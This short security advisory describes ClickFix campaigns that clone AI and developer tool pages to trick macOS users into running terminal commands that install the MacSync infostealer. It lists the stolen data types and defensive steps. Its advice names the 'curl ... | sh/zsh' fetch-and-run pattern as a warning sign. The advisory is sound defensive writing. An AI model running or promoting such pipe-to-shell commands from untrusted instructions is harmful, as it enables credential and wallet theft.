What happened
Researchers report active ClickFix campaigns that impersonate legitimate AI and developer tooling pages, then trick victims into copying and running terminal commands on macOS. Instead of installing a real tool, the command chain installs the MacSync infostealer.
Campaigns observed since late 2025 continue to evolve, with newer variants adding stronger evasion behavior and broader data theft capability.
What can be stolen
MacSync-focused collection can include:
- browser credentials and session artifacts,
- macOS keychain data,
- SSH/cloud credentials,
- crypto wallet material and seed phrases,
- sensitive local files and notes.
Because the infection path is user-executed terminal commands, this bypasses many users’ normal “app download” caution checks.
Why this matters
ClickFix-style attacks are scaling because they abuse a workflow many technical users already trust (copy/paste install commands). That makes this tactic effective against developers, creators, and power users who often hold high-value credentials.
What to do now
- Treat any “copy this terminal command” prompt from ads, cloned pages, or social links as suspicious.
- Restrict or monitor shell command execution from untrusted instructions, especially commands using
curl ... | sh/zshpatterns. - Use endpoint controls that alert on unexpected shell-to-network behaviors and credential store access.
- Rotate credentials immediately if a device may have executed unknown install commands.
- Add user awareness examples for ClickFix/InstallFix lures to security training.
Bottom line
This is a social-engineering-first malware delivery model, not a one-off campaign. Defenses need to focus on user-driven command execution risk as much as traditional exploit prevention.